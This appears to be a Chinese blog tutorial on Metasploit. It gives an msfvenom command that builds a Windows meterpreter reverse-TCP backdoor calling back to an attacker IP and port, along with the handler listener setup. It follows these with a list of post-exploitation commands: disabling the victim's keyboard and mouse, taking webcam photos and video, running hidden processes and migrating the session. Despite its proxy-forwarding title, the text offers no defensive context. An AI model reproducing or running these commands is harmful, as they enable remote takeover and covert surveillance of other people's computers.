当前位置:   article > 正文

MSF配置代理转发

MSF配置代理转发

一、网络架构

 二、MSF实现主机1上线

生成后门

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.222 lport=1111 -f exe >
  2. /home/share/1111.exe

生成监听器

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost 0.0.0.0
  5. set lport 1111
  6. run

在被入侵的主机上,执行后门后,此时会发现上线成功

 三、MSF的命令

基本系统命令

  1. background #将当前会话放置后台,然后可以再运行其他模块进行提权
  2. sessions #sessions –h 查看帮助
  3. sessions -i <ID值> #进入会话 -k 杀死会话
  4. getuid # 查看权限
  5. getpid # 获取当前进程的pid
  6. sysinfo # 查看目标机系统信息
  7. ps # 查看当前活跃进程 kill <PID值> 杀死进程
  8. idletime #查看目标机发呆(无操作)时间
  9. reboot / shutdown #重启/关机
  10. shell #进入目标机cmd shell

uictl开关键盘、鼠标

  1. uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
  2. uictl disable mouse #禁用鼠标
  3. uictl disable keyboard #禁用键盘

webcam摄像头命令

  1. webcam_list #查看摄像头
  2. webcam_snap #通过摄像头拍照
  3. webcam_stream #通过摄像头开启视频

执行exe文件

  1. execute -f #命令在目标主机上执行应用程序
  2. execute -f c:\\111.exe
  3. execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

migrate进程迁移

  1. getpid # 获取当前进程的pid
  2. ps # 查看当前活跃进程
  3. migrate <pid值> #将Meterpreter会话移植到指定pid值进程中,
  4. kill <pid值> #杀死进程
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/煮酒与君饮/article/detail/953781
推荐阅读
相关标签
  

闽ICP备14008679号